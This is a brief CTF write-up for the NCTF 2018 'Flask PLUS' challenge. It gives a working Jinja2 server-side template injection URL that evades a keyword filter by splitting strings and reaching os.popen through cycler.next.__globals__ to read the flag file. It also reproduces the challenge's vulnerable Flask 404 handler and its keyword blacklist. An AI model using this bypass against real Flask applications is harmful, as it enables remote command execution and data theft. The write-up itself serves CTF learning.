Problem: [NCTF 2018]Flask PLUS
思路
- 解题大致思路
- fenjing一把梭了
EXP
- 具体攻击代码
http://node4.anna.nssctf.cn:24494/index{{(cycler.next.__globals__['o''s']['po''pen']('cat /Th1s_is__F1114g')).read()}}
总结
- 对该题的考点总结
扒了一下源码
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from flask import Flask,render_template,render_template_string,redirect,request,session,abort,send_from_directory
import os
from urllib import parse
app = Flask(__name__)
@app.route("/")
def index():
"主页"
return render_template("index2.html")
@app.errorhandler(404)
def page_not_found(e):
def safe_jinja(s):
blacklist = ['import','getattr','os','class','subclasses','mro','request','args','eval','if','for','subprocess','file','open','popen','builtins','compile','execfile','from_pyfile','config','local','self','item','getitem','getattribute','func_globals','__init__','join','__dict__']
flag = True
for no in blacklist:
if no.lower() in s.lower():
# print(no.lower())
flag= False
break
return flag
template = '''
{%% block body %%}
<div class="center-content error">
<h1>Oops! That page doesn't exist.</h1>
<h3>%s</h3>
</div>
{%% endblock %%}
''' % (parse.unquote(request.url))
# print(parse.unquote(request.url), safe_jinja(parse.unquote(request.url)))
if safe_jinja(parse.unquote(request.url)):
return render_template_string(template), 404
else:
return render_template("404.html"), 404
if __name__ == "__main__":
app.run(host='0.0.0.0',port=5000)